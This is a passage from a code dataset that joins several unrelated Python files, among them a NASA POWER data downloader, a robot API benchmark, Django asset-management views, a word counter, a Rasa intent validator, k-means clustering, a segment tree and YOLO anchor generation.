DataFrame = pd.read_csv(FILE_DIR)\n DataFrame.to_csv(FILE_DIR,index=False,header=True)\n DataFrame = pd.read_csv(FILE_DIR)\n \n #code for horizontal formatting for csv\n \n #DataFrame.rename(columns={\"Unnamed: 0\":\"Parameter\"},inplace=True)\n #DataFrame = DataFrame.T\n #DataFrame.to_csv(FILE_DIR,index=True,header=False)\n #DataFrame = pd.read_csv(FILE_DIR)\n #DataFrame.insert(0,\"Cordinate\",str(tempLatitude)+\",\"+str(tempLongitude), True)\n #DataFrame.to_csv(FILE_DIR,index=False,header=True)\n \n #code for vertical formatting for csv\n \n DataFrame.rename(columns={\"Unnamed: 0\":\"Dates\"},inplace=True)\n DataFrame[\"Latitude\"]=tempLatitude\n DataFrame[\"Longitude\"]=tempLongitude\n DataFrame.to_csv(FILE_DIR,index=False,header=True)\nclass Operation():\n def __init__(self):\n self.processes = 10 # Please do not go more than 10 
concurrent requests.\n start_date = "20100101"\n end_date = "20210430"\n parametersCustom = "PRECTOT,RH2M,T2M_RANGE,T2M_MAX,T2M_MIN,WS50M_RANGE,WS10M_RANGE"\n self.API_URL = r"https://power.larc.nasa.gov/cgi-bin/v1/DataAccess.py?request=execute&identifier=SinglePoint&tempAverage=DAILY&parameters="+parametersCustom+"&startDate="+start_date+"&endDate="+end_date+"&lat={latitude}&lon={longitude}&outputList=JSON&userCommunity=AG"\n self.FILE_DIR = "CSV/{serial}.csv"\n self.tempLatitude = "{templatitude}"\n self.tempLongitude = "{templongitude}"\n self.messages = []\n self.times = {}\n def Perform(self):\n BEGIN_TIME = time.time()\n Latitude_Longitude = []\n pointsDataFrame = pd.read_csv("D:/JOB/GITHUB/Image-Processing/Get-Values-From-{Time}-To-{Time}-For-A-Given-Lat-Long/points.csv", usecols=['X', 'Y', 'W_GIDGID'])\n for Long,Lat,Serial in zip(pointsDataFrame['X'],pointsDataFrame['Y'],pointsDataFrame['W_GIDGID']):\n Latitude_Longitude.append([Lat,Long,Serial])\n POINTS = []\n for Latitude, Longitude, Serial in Latitude_Longitude:\n LONG_LAT_QUERY = self.API_URL.format(longitude=Longitude, latitude=Latitude)\n LONG_LAT_FILE = self.FILE_DIR.format(serial=Serial)\n TempLat = self.tempLatitude.format(templatitude=Latitude)\n TempLong = self.tempLongitude.format(templongitude=Longitude)\n POINTS.append((LONG_LAT_QUERY, LONG_LAT_FILE, TempLat, TempLong))\n MP_POOL = multiprocessing.Pool(self.processes)\n TEMP_X = MP_POOL.imap_unordered(Get, POINTS)\n DataFrames = []\n for i, DataFrame in enumerate(TEMP_X, 1):\n DataFrames.append(DataFrame)\n sys.stderr.write('\\rExporting {0:%}'.format(i/len(POINTS)))\n self.times["Total Script"] = round((time.time() - BEGIN_TIME), 2)\n print ("\\n")\n print ("Total Script Time:", self.times["Total Script"])\nif __name__ == '__main__':\n Operation().Perform()","sub_path":"Get-Values-From-{Time}-To-{Time}-For-A-Given-Lat-Long/mul_point_data_download_csv.py","file_name":"mul_point_data_download_csv.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"547443916","text":"'''\nCreated on 10/07/2015\n\n@author: djchr\n'''\n'''\nCreated on 04/11/2014\n\n@author: djchr\n'''\nimport serial, time, sys, math, threading\nsys.path.append("../api/")\nfrom fableAPI import FableAPI \nglobal api\n\n\ndef benchmark(func, string, *args, **kwargs):\n error = 0\n t = time.clock()\n for i in range(n):\n res = func(*args, **kwargs)\n if not res: error +=1\n print(string +str(round(1000*(time.clock()-t)/n, digits)) +" \\t\\t "+ str(100*error/n))\n\nprint("Welcome to test ID!")\napi = FableAPI()\napi.setup(1)\n\nn = 100\ndigits=2\ntestType = "Wheel"\nid = None\nif testType == "Joint":\n id = 10\nif testType == "Head":\n id = 16\nif testType == "Wheel":\n id = 30\n\nprint(" Function \\t\\t\\t\\t Lag (ms) \\t Errors (%)")\nprint("-------------------------------------------------------------------------")\nbenchmark(api.pingDongle, "api.pingDongle \\t\\t\\t\\t ")\nbenchmark(api.pingModule, "api.pingModule \\t\\t\\t\\t ", id)\nbenchmark(api.setModuleRGBLed, "api.setModuleRGBLed (ack)\\t\\t ", id, 255,0,0, ack = True)\nbenchmark(api.setModuleRGBLed, "api.setModuleRGBLed (no ack)\\t\\t ", id, 255,0,0, ack = False)\nbenchmark(api.setModuleBuzzer, "api.setModuleBuzzer (ack) \\t\\t ", id, 0, ack = True)\nbenchmark(api.setModuleBuzzer, "api.setModuleBuzzer (no ack) \\t\\t ", id, 0, ack = False)\nbenchmark(api.getModuleBatteryLevel, "api.getModuleBatteryLevel \\t\\t 
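`Perform` above fans the per-point downloads across a `multiprocessing.Pool` and iterates `imap_unordered`, so progress is reported as each worker finishes, in completion order rather than submission order. The pattern in isolation, with a stand-in worker instead of the real `Get`:

```python
# Pool.imap_unordered progress reporting, as in Perform above
# (sketch; slow_square stands in for the network-bound Get worker).
import sys
import time
import multiprocessing

def slow_square(x):
    time.sleep(0.1)            # pretend this is an HTTP request
    return x * x

if __name__ == '__main__':
    jobs = list(range(40))
    with multiprocessing.Pool(processes=10) as pool:
        results = []
        # yields each result as soon as any worker finishes
        for i, value in enumerate(pool.imap_unordered(slow_square, jobs), 1):
            results.append(value)
            sys.stderr.write('\rExporting {0:%}'.format(i / len(jobs)))
    sys.stderr.write('\n')
```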
\", id)\n##################################JOINT SPECIFIC#########################################\nif testType == \"Joint\":\n benchmark(api.getModuleMotorPosition, \"api.getModuleMotorPosition \\t\\t \", id, 0)\n benchmark(api.getModuleMotorSpeed, \"api.getModuleMotorSpeed \\t\\t \", id, 0)\n benchmark(api.getModuleMotorTorque, \"api.getModuleMotorTorque \\t\\t \", id, 0)\n benchmark(api.setModuleMotorPosition, \"api.setModuleMotorPosition (ack) \\t \", id, 0, 0, ack = True)\n benchmark(api.setModuleMotorPosition, \"api.setModuleMotorPosition (no ack) \\t \", id, 0, 0, ack = False)\n benchmark(api.setModuleMotorTorque, \"api.setModuleMotorTorque (ack) \\t\\t \", id, 0, 0, ack = True)\n benchmark(api.setModuleMotorTorque, \"api.setModuleMotorTorque (no ack) \\t \", id, 0, 0, ack = False)\n benchmark(api.setModuleMotorMaxSpeed, \"api.setModuleMotorMaxSpeed (ack) \\t \", id, 0, 0, ack = True)\n benchmark(api.setModuleMotorMaxSpeed, \"api.setModuleMotorMaxSpeed (no ack) \\t \", id, 0, 0, ack = False)\n\n##################################HEAD SPECIFIC#########################################\nif testType == \"Head\":\n benchmark(api.getHeadModuleDistance, \"api.getHeadModuleDistance \\t\\t \", id)\n benchmark(api.getHeadModuleAccelerometer, \"api.getHeadModuleAccelerometer \\t\\t \", id)\n benchmark(api.getHeadModuleGyroscope, \"api.getHeadModuleGyroscope \\t\\t \", id)\n benchmark(api.getHeadModuleMagnetometer, \"api.getHeadModuleMagnetometer\\t\\t \", id)\n benchmark(api.getHeadModuleTemperature, \"api.getHeadModuleTemperature\\t\\t \", id)\n benchmark(api.getHeadModuleIMU, \"api.getHeadModuleIMU\\t\\t\\t \", id)\n benchmark(api.getHeadModuleADC, \"api.getHeadModuleADC\\t\\t\\t \", id, 0)\n \n\n#data = api.getHeadModuleAccelerometer(16, axis='all')\n #data = api.getHeadModuleTemperature(16)\n data = api.getHeadModuleGyroscope(16)\n \napi.sleep(1)\napi.terminate()\n","sub_path":"Robot_toolboxPy/Ismael_eclipse/Fable-master/pc-software/python/tests/benchmarkJointModule.py","file_name":"benchmarkJointModule.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"353409085","text":"from django.shortcuts import render\nfrom assets.server import *\nfrom personnel.server import *\nfrom assets.forms.form import *\nimport json\nfrom django.db import transaction\nfrom common.functions import filter_fields,build_attachment_info,compare_fields,compare_json\nfrom django.shortcuts import render, HttpResponse\nfrom personnel.templatetags.personnel_tags import *\nfrom sfa.templatetags.sfa_tags import *\nfrom django.core import serializers\nfrom common.functions import *\n\n# Create your views here.\n\ndef assets(request):\n company_id = int(request.GET.get(\"company\", 6))\n project_id = int(request.GET.get(\"project\", 3))\n query_sets = assets_db.query_assets_by_list()\n if company_id < 6:\n query_sets = query_sets.filter(company_id=company_id)\n if project_id < 3:\n query_sets = query_sets.filter(project_id=project_id)\n return render(request, \"assets/assets.html\",\n {\"query_sets\": query_sets, \"company\": company_id, \"project\": project_id})\n\ndef assets_edit(request):\n mothod = request.method\n print('mothod', mothod)\n if mothod == \"GET\":\n nid = request.GET.get(\"nid\", \"\")\n print('request', request.GET)\n if nid:\n # 更新\n query_sets = assets_db.query_assets_by_id(nid)\n assets_attach = assetsattach_db.query_assets_attachment_by_sid(nid)\n if not assets_attach:\n assets_attach = \"\"\n else:\n 
query_sets = {}\n assets_attach = {}\n return render(request, \"assets/assets_edit.html\", {\"query_set\": query_sets,\n \"assets_attach\": assets_attach,\n \"sid\": nid})\n else:\n ret = {'status': False, \"data\": '', \"message\": \"\"}\n print('data', ret)\n form = AssetsForm(data=request.POST)\n print(\"request.POST\", request.POST)\n if form.is_valid():\n data = request.POST\n data = data.dict()\n assets_attach = data.get(\"attach\", '')\n nid = data.get(\"sid\", None)\n assets_attach = list(json.loads(assets_attach))\n if nid:\n # 更新\n try:\n with transaction.atomic():\n # 更新收支管理\n record = assets_db.query_assets_by_id(nid)\n assets_info = compare_fields(Assets._update, record, data)\n if assets_info:\n assets_info[\"nid\"] = nid\n assets_db.update_info(assets_info)\n if assets_attach:\n # 更新附件\n att_record = assetsattach_db.query_assets_attachment_by_sid(nid)\n # 数据对比\n insert_att, update_att, delete_id_att = compare_json(att_record, assets_attach, \"said\")\n if insert_att:\n insert_att = build_attachment_info({\"sid_id\": nid}, insert_att)\n assetsattach_db.mutil_insert_attachment(insert_att)\n if update_att:\n assetsattach_db.mutil_update_attachment(update_att)\n if delete_id_att:\n assetsattach_db.mutil_delete_task_attachment(delete_id_att)\n ret['status'] = True\n ret['data'] = nid\n except Exception as e:\n print(e)\n ret[\"message\"] = \"更新失败\"\n else:\n # 创建\n try:\n with transaction.atomic():\n assets_info = filter_fields(Assets._insert, data)\n sid = assets_db.insert_info(assets_info)\n if assets_attach:\n assets_attach = build_attachment_info({\"sid_id\": sid}, assets_attach)\n assetsattach_db.mutil_insert_attachment(assets_attach)\n ret['status'] = True\n ret['data'] = sid\n except Exception as e:\n print(e)\n ret[\"message\"] = \"添加失败\"\n else:\n errors = form.errors.as_data().values()\n firsterror = str(list(errors)[0][0])\n ret['message'] = firsterror\n return HttpResponse(json.dumps(ret))\n\ndef assets_detail(request):\n id = request.GET.get(\"id\", None)\n ret = {\"status\": False, \"data\": \"\", \"message\": \"\"}\n if id:\n try:\n assets_obj = assets_db.query_assets_by_id(id)\n if assets_obj:\n # 格式化数据\n assets_json = assets_obj.__dict__\n assets_json.pop('_state')\n assets_json[\"company_id\"] = change_to_company(assets_json[\"company_id\"])\n assets_json[\"project_id\"] = change_to_project(assets_json[\"project_id\"])\n assets_json[\"assets_classify_id\"] = change_to_assets_classify(assets_json[\"assets_classify_id\"])\n assets_json[\"save_coordinate_id\"] = change_to_save_coordinate(assets_json[\"save_coordinate_id\"])\n assets_json[\"procurement_name_id\"] = change_to_procurement(assets_json[\"procurement_name_id\"])\n assets_json[\"user_name_id\"] = change_to_username(assets_json[\"user_name_id\"])\n assets_json[\"assets_status_id\"] = change_to_assets_status(assets_json[\"assets_status_id\"])\n assets_json[\"approver_id\"] = change_to_approver2(assets_json[\"approver_id\"])\n assets_attach = assetsattach_db.query_assets_attachment(id)\n if assets_attach:\n assets_json['attach'] = serializers.serialize(\"json\", assets_attach)\n else:\n assets_json['attach'] = ''\n ret['status'] = True\n ret['data'] = assets_json\n return HttpResponse(json.dumps(ret, cls=CJSONEncoder))\n except Exception as e:\n print(e)\n return render(request, '404.html')\n\ndef assets_delete(request):\n \"\"\"删除资产管理\"\"\"\n ret = {'status': False, \"data\": \"\", \"message\": \"\"}\n ids = request.GET.get(\"ids\", '')\n ids = ids.split(\"|\")\n # 转化成数字\n id_list = []\n for item in ids:\n 
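The update branch above relies on `compare_json(att_record, assets_attach, "said")` to split incoming attachment rows into inserts, updates, and deletions; that helper lives in `common.functions` and is not shown in this file. One plausible contract, inferred purely from how its three return values are used, is sketched below; treat it as an illustration, not the real implementation:

```python
# Hypothetical reconstruction of compare_json's contract (illustration only;
# the real helper is in common.functions and is not shown here).
def compare_json(existing, incoming, key):
    existing_by_key = {row[key]: row for row in existing}
    incoming_keys = {row[key] for row in incoming if key in row}
    inserts = [row for row in incoming if key not in row]          # no id yet: new row
    updates = [row for row in incoming
               if key in row and row != existing_by_key.get(row[key])]
    delete_ids = [k for k in existing_by_key if k not in incoming_keys]
    return inserts, updates, delete_ids

existing = [{'said': 1, 'path': 'a.png'}, {'said': 2, 'path': 'b.png'}]
incoming = [{'said': 1, 'path': 'a2.png'}, {'path': 'c.png'}]
print(compare_json(existing, incoming, 'said'))
# ([{'path': 'c.png'}], [{'said': 1, 'path': 'a2.png'}], [2])
```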
if item:\n id_list.append(int(item))\n try:\n with transaction.atomic():\n assets_db.multi_delete(id_list)\n # 删除附件\n assetsattach_db. multi_delete_attach_by_edit_id(id_list)\n ret['status'] = True\n except Exception as e:\n print(e)\n ret['message'] = \"删除失败\"\n return HttpResponse(json.dumps(ret))\n\ndef assets_detail_1(request):\n cid = request.GET.get(\"nid\", None)\n id = 1\n if cid:\n query_sets = assets_db.query_assets_by_id(cid)\n query_set = supplies_db.query_supp_by_id(id)\n get_sets = suppliesreturn_db.query_supp_by_id(id)\n if query_sets:\n assets_attach = assetsattach_db.query_assets_attachment(cid)\n if not assets_attach:\n assets_attach = ''\n return render(request, \"assets/assets_detail.html\", {\"query_set\": query_sets,\n \"query_sets\": query_set,\n \"get_sets\": get_sets,\n \"assets_attach\": assets_attach,\n })\n return render(request, '404.html')\n\n\ndef assets_detail_2(request):\n id = request.GET.get(\"id\", None)\n ret = {\"status\": False, \"data\": \"\", \"message\": \"\"}\n if id:\n try:\n assets_obj = supplies_db.query_supp_by_id(id)\n if assets_obj:\n # 格式化数据\n assets_json = assets_obj.__dict__\n assets_json.pop('_state')\n assets_json[\"supplies_id_id\"] = change_to_supplies(assets_json[\"supplies_id_id\"])\n assets_json[\"sid_id\"] = change_to_staff(assets_json[\"sid_id\"])\n assets_attach = assetsattach_db.query_assets_attachment(id)\n if assets_attach:\n assets_json['attach'] = serializers.serialize(\"json\", assets_attach)\n else:\n assets_json['attach'] = ''\n ret['status'] = True\n ret['data'] = assets_json\n return HttpResponse(json.dumps(ret, cls=CJSONEncoder))\n except Exception as e:\n print(e)\n return render(request, '404.html')\n\n\ndef assets_detail_3(request):\n id = request.GET.get(\"id\", None)\n ret = {\"status\": False, \"data\": \"\", \"message\": \"\"}\n if id:\n try:\n assets_obj = suppliesreturn_db.query_supp_by_id(id)\n if assets_obj:\n # 格式化数据\n assets_json = assets_obj.__dict__\n assets_json.pop('_state')\n assets_json[\"supplies_id_id\"] = change_to_supplies(assets_json[\"supplies_id_id\"])\n assets_json[\"sid_id\"] = change_to_staff(assets_json[\"sid_id\"])\n assets_attach = assetsattach_db.query_assets_attachment(id)\n if assets_attach:\n assets_json['attach'] = serializers.serialize(\"json\", assets_attach)\n else:\n assets_json['attach'] = ''\n ret['status'] = True\n ret['data'] = assets_json\n return HttpResponse(json.dumps(ret, cls=CJSONEncoder))\n except Exception as e:\n print(e)\n return render(request, '404.html')","sub_path":"apps/assets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92433476","text":"#Jason Aylward\n#January 14, 2015\n#Homework 3\n\nimport sys\n\ndef format_text(original_text):\n \"\"\"Receives a string and returns a list of acceptable words\"\"\"\n new_text = original_text.lower()\n bad_chars = [\"\\n\",\"\\r\",\"\\t\",\".\",\",\",'\"',\"?\",\"!\",\"]\",\"[\",\n \"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"'\",\n \"(\",\")\",\"@\",\"#\",\"$\",\"%\",\"^\",\"&\",\"*\",\"_\",\"+\",\n \":\",\";\",\"/\",\"http\",\"www\",\"`\",\"~\",\"--\"]\n for bad_char in bad_chars:\n new_text = new_text.replace(bad_char,' ')\n text = new_text.split(' ')\n clean_text = []\n for word in text:\n #Remove empty words and remaining s's from contractions and possessives\n if(word != \"\" and word != \"s\"):\n clean_text.insert(len(clean_text),word)\n return clean_text\n\ndef 
word_frequency(input_text):\n \"\"\"Receives a string\n and returns a dictionary of words and their counts\n also prints a histogramic list of the top 20 words\"\"\"\n word_list = format_text(input_text)\n dict_of_words = {}\n for word in word_list:\n try:\n dict_of_words[word] += 1\n except:\n dict_of_words[word] = 1\n analyze_dict(dict_of_words)\n return dict_of_words\n\ndef analyze_dict(dict_of_counts):\n \"\"\"Receives a dictionary of words and their word counts\n sorts the dictionary and prints the top 20 occurring words\"\"\"\n word_list = sorted(dict_of_counts.items(), key=lambda x: x[1], reverse = True)\n for x in range(0,20):\n try:\n #Cleaning up the histogram basing spaces on word-length\n if len(word_list[x][0]) <= 3:\n print(\"{}. {}: {} times \\t\\t{}\".format(x+1,word_list[x][0],word_list[x][1],histogram(word_list[x][1],word_list[0][1])))\n else:\n print(\"{}. {}: {} times\\t\\t{}\".format(x+1,word_list[x][0],word_list[x][1],histogram(word_list[x][1],word_list[0][1])))\n except:\n print(\"Sorry. There are less than twenty words.\")\n break\n print(\"\\n\")\n\ndef histogram(current,max_count):\n \"\"\"Returns string of #'s of an appropriate length\"\"\"\n normalizer = 50/max_count\n hash_string = \" \"\n count = 0\n while count < (current*normalizer):\n hash_string = hash_string + \"#\"\n count += 1\n return hash_string\n\n\n\"\"\" Start of program \"\"\"\n\nif __name__ == '__main__':\n # The top-level script is called __main__ so if a function from this\n # script is being imported, the following code will not be run\n try:\n with open((sys.argv[1])) as input_file:\n input_lines = input_file.readlines()\n except:\n with open(\"sample.txt\") as input_file:\n input_lines = input_file.readlines()\n\n #join all the lines of text by \" \"\n input_string = \" \".join(input_lines)\n dict_of_words = word_frequency(input_string)\n","sub_path":"word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535756376","text":"import re\nimport numpy as np\nimport sqlite3\nimport requests\nfrom typing import *\nfrom connection import DB_connection\nfrom utils import load,save\n\ndef connection(mess:str) -> dict:\n data = {\n \"message_id\": \"b2831e73-1407-4ba0-a861-0f30a42a42a2a5a\",\n \"text\": mess,\n \"sender\": \"user\"\n }\n r = requests.post(url = \"http://localhost:5005/model/parse\", json = data, headers={'Content-Type': 'application/json'}) \n data = r.json()\n return data\n\ndef databaseRequest(name:str, conversension: dict) -> tuple:\n con = DB_connection()\n sentence = \"SELECT count(id) FROM \"+ name + \";\"\n con.cursorObj.execute(sentence)\n amountOfData = con.cursorObj.fetchone()[0]\n print(amountOfData)\n if amountOfData == 0:\n req = validationConversations(conversension)\n save(name,req['dist'])\n result = req\n con.sql_insert_rate(req[\"fail\"], req[\"success\"],name)\n for intentcion,data in zip(req[\"names\"],req[\"data\"]):\n print((intentcion,data))\n con.sql_insert((intentcion,data),name)\n return result\n else:\n sentence = \"select name,data from \" + name + \";\"\n con.cursorObj.execute(sentence)\n rows = con.cursorObj.fetchall()\n intentions = []\n confiances = []\n for intention,confiance in rows:\n intentions.append(intention)\n confiances.append(confiance)\n sentence = \"select fail,success from rate where conversation='\"+name+\"';\"\n #print(sentence)\n con.cursorObj.execute(sentence)\n obj = 
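`word_frequency` above builds its count table with a try/except-guarded dict and `analyze_dict` re-sorts it by count; `collections.Counter` does both in one step, and the bar can be scaled the same way `histogram()` scales it (50 characters for the most frequent word). A compact equivalent:

```python
# Counter-based equivalent of word_frequency + analyze_dict above (sketch).
from collections import Counter

def top_words(words, k=20, width=50):
    counts = Counter(words)
    if not counts:
        return
    top = counts.most_common(k)          # already sorted by count, descending
    scale = width / top[0][1]            # widest bar goes to the most frequent word
    for rank, (word, count) in enumerate(top, 1):
        print('{}. {}: {} times\t{}'.format(rank, word, count, '#' * int(count * scale)))

top_words('the quick brown fox jumps over the lazy dog the fox'.split())
```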
con.cursorObj.fetchall()[0]\n #print(obj)\n return {\n \"names\":intentions,\n \"data\":confiances,\n \"fail\":obj[0],\n \"success\":obj[1],\n \"dist\":load(name)\n }\n\ndef validationConversations(data:dict) -> dict:\n x1 = []\n y1 = []\n dist = {}\n succes = 0\n fail = 0\n for conv in data.keys(): \n list_values = []\n x1.append(conv)\n for example in data[conv]:\n awnser = connection(example)\n #print(awnser)\n dist[awnser['intent']['name']] = {\n \"intentions\":[i['name'] for i in awnser['intent_ranking']],\n \"pred\":[round(i['confidence'],5) for i in awnser['intent_ranking']]\n }\n if re.sub(r'-\\d','',conv) == awnser['intent']['name']:\n succes += 1\n list_values.append(round(awnser['intent']['confidence'],2))\n else:\n #print(awnser)\n #print(\"Label: \", conv, \"Awnser:\", awnser['intent']['name'], \"with\", example)\n fail += 1\n list_values.append(0.0)\n y1.append(np.mean(list_values))\n return {\n \"names\":x1,\n \"data\":y1,\n \"fail\":round(100*fail/(fail+succes)),\n \"success\":round(100*succes/(fail+succes)),\n \"dist\":dist\n }\n\ndef delete_table(name:str):\n con = DB_connection()\n con.sql_delete_table(name)","sub_path":"wedPage/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"295970599","text":"import math\nfile_input = open(\"input.txt\",\"r\")\nk = int(file_input.readline().strip())\ntran=[]\n\nwhile True:\n line = file_input.readline().strip()\n if not line:\n break\n l=line.split(\",\")\n tran.append(l)\n\nprint (tran)\n\ndef dist(p1,p2):\n res=0\n for i in range(len(p1)):\n res += math.pow(float(p1[i])-float(p2[i]),2)\n\n final_res = math.sqrt(res)\n return final_res\n\ndef clusters(data,centroids):\n l1= dict() #for maintaining the distance corresponding to each cluster\n l2=dict() #for storing the points in corresponding cluster \n for i in range(len(centroids)):\n l2[i]=[] #value is going to be a list\n for i in range(len(data)):\n p1 = data[i] #take one point at a time\n for index in range(len(centroids)): #compute the distance of that one point with all the clusters \n p2= centroids[index] \n d = dist(p1,p2)\n #print(d)\n l1[index]=d\n \n res = min(l1.values())\n #print(\"min\",res)\n for key,value in l1.items():\n if value == res:\n kk = key\n l2[kk].append(i)\n print(l2)\n return (l2)\n\ndef mean(l2,tran):\n centroids=[]\n tmp=[]\n for key,values in l2.items():\n l=values\n x1=0\n for j in range(len(tran[0])):\n x1=0\n for k in range(len(l)):\n p=tran[l[k]]\n x1 +=int(p[j])\n x1=x1/len(l)\n tmp.append(x1)\n centroids.append(tmp)\n tmp=[]\n print(\"New Centroids:\",centroids)\n return (centroids)\n \n \n\ncentroids = tran[0:k]\nprint(centroids)\nold = centroids\nnew = None\nwhile True:\n old = centroids\n l2=clusters(tran,centroids)\n centroids = mean(l2,tran)\n new = centroids\n if (new == old):\n break\n \n\n \n","sub_path":"my_kmeans.py","file_name":"my_kmeans.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"45396504","text":"class Intervalac:\n\tdef __init__(self, lst):\n\t\tself.size = self._get_size(lst)\n\t\tself.lst = [0] * self.size + lst + [0] * (self.size - len(lst))\n\t\tself._create(len(self.lst))\n\n\tdef _create(self, n):\n\t\tfor i in range(n-2,0,-2):\n\t\t\tself.lst[i//2] = self.lst[i] + self.lst[i+1]\n\n\tdef _get_size(self, lst):\n\t\tn = 1\n\t\twhile n < len(lst):\n\t\t\tn *= 2\n\t\treturn n\n\n\tdef 
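`clusters()` and `mean()` in the k-means script above walk the points and centroids in nested Python loops; the same Lloyd iteration collapses to a few broadcasted NumPy expressions. A vectorized sketch on synthetic data (the script seeds its centroids with the first k transactions, mirrored here):

```python
# One vectorized k-means iteration, equivalent to clusters() + mean() above
# (sketch; random points stand in for the transactions read from input.txt).
import numpy as np

k = 3
rng = np.random.default_rng(0)
data = rng.random((100, 2))
centroids = data[:k].copy()                  # first k points, as in the script

# (n_points, k) distance matrix via broadcasting instead of nested loops
dists = np.linalg.norm(data[:, None, :] - centroids[None, :, :], axis=2)
assignments = dists.argmin(axis=1)

# each new centroid is the mean of the points assigned to it
new_centroids = np.array([data[assignments == j].mean(axis=0) for j in range(k)])
print(new_centroids)
```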
_get_interval(self, x, y, start, end, i):\n\t\tif x <= start and end <= y:\n\t\t\treturn self.lst[i]\n\t\tif y <= start or x >= end:\n\t\t\treturn 0\n\n\t\treturn self._get_interval(x, y, start, (start+end)//2, i*2) + self._get_interval(x, y, (start+end)//2, end, i*2+1)\n\n\tdef get(self, x, y):\n\t\treturn self._get_interval(x, y, 1, self.size+1, 1)\n\n\tdef set(self, i, val):\n\t\tindex = self.size + i - 1\n\t\tself.lst[index] = val\n\n\t\twhile index != 1:\n\t\t\tindex //= 2\n\t\t\tself.lst[index] = self.lst[index*2] + self.lst[index*2+1]\n\n\nif __name__ == '__main__':\n\tlst = [8,10,0,0,0,1,100]\n\tintervalac = Intervalac(lst)\n\tprint(intervalac.lst)\n\n\tprint(intervalac.get(1,3))\n\tintervalac.set(2, -100)\n\tprint(intervalac.lst)\n\tprint(intervalac.get(1,3))\n","sub_path":"intervalac.py","file_name":"intervalac.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"152038641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Shiyu Huang\n# @File : utils.py\n\nimport os\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy as np\nimport random\nfrom TART.utils import get_all_files\nimport pickle\nfrom sklearn.utils.extmath import cartesian\n\n\ndef IOU(x, centroids):\n similarities = []\n\n for centroid in centroids:\n c_w, c_h = centroid\n w, h = x\n if c_w >= w and c_h >= h:\n similarity = w * h / (c_w * c_h)\n elif c_w >= w and c_h <= h:\n similarity = w * c_h / (w * h + (c_w - w) * c_h)\n elif c_w <= w and c_h >= h:\n similarity = c_w * h / (w * h + c_w * (c_h - h))\n else: # means both w,h are bigger than c_w and c_h respectively\n similarity = (c_w * c_h) / (w * h)\n similarities.append(similarity) # will become (k,) shape\n return np.array(similarities)\n\n\ndef kmeans(annotations, centroids):\n anno_number = annotations.shape[0]\n anchor_number, dim = centroids.shape\n\n prev_assignments = np.ones(anno_number) * (-1)\n\n iter = 0\n while True:\n D = []\n iter += 1\n for i in range(anno_number):\n d = 1 - IOU(annotations[i], centroids)\n D.append(d)\n D = np.array(D)\n\n assignments = np.argmin(D, axis=1)\n if (assignments == prev_assignments).all():\n print(anno_number, [np.sum(assignments == j) for j in range(anchor_number)])\n print(centroids)\n return centroids\n\n centroid_sums = np.zeros((anchor_number, dim), np.float)\n for i in range(anno_number):\n centroid_sums[assignments[i]] += annotations[i]\n for j in range(anchor_number):\n\n if np.sum(assignments == j) != 0:\n centroids[j] = centroid_sums[j] / (np.sum(assignments == j))\n else:\n centroids[j] = annotations[random.randint(0, len(annotations) - 1)]\n\n prev_assignments = assignments.copy()\n\n\ndef gen_anchors(anno_dir, class_names, save_path, max_size, anchor_number=9):\n files = get_all_files(anno_dir, '.txt')\n\n class_wh = {}\n for name in class_names:\n class_wh[name] = []\n\n for file in files:\n f = open(file, 'r')\n lines = f.readlines()\n for line in lines:\n line = line.strip()\n line_s = line.split(' ')\n class_wh[line_s[0]].append([float(line_s[3]), float(line_s[4])])\n\n miss_key = []\n\n anchor_dict = {}\n for key in class_wh:\n if len(class_wh[key]) == 0:\n miss_key.append(key)\n continue\n print('{}:'.format(key))\n annotations = np.array(class_wh[key])\n indices = [random.randrange(annotations.shape[0]) for _ in range(anchor_number)]\n centroids = annotations[indices] # centroids中是该类的annotations中随机的anchor_number个编号\n centroids = kmeans(annotations, centroids)\n\n centroids = 
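The anchor-generation `kmeans` above clusters width/height pairs on `1 - IOU` instead of Euclidean distance, the usual YOLO-style trick, and the branchy `IOU` helper is equivalent to taking the per-dimension minimum of two corner-aligned boxes. A compact check of that metric:

```python
# 1 - IOU distance used by the anchor k-means above (sketch; the four-branch
# width/height comparison reduces to min() per dimension for corner-aligned boxes).
import numpy as np

def iou_wh(box, centroids):
    box = np.asarray(box, dtype=float)
    centroids = np.asarray(centroids, dtype=float)
    inter = np.minimum(box[0], centroids[:, 0]) * np.minimum(box[1], centroids[:, 1])
    union = box[0] * box[1] + centroids[:, 0] * centroids[:, 1] - inter
    return inter / union

centroids = np.array([[10.0, 20.0], [30.0, 30.0]])
print(1 - iou_wh([12, 18], centroids))   # smaller distance = better-matching anchor
```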
